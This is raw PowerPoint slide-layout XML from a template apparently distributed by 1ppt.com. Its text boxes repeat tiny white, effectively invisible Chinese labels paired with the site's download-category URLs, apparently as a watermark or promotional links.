              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout79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79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79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79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80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80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80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80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80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80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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout80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80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80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80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8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81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81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81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81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81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81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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout81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81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81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81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8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82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82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82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82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82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82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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
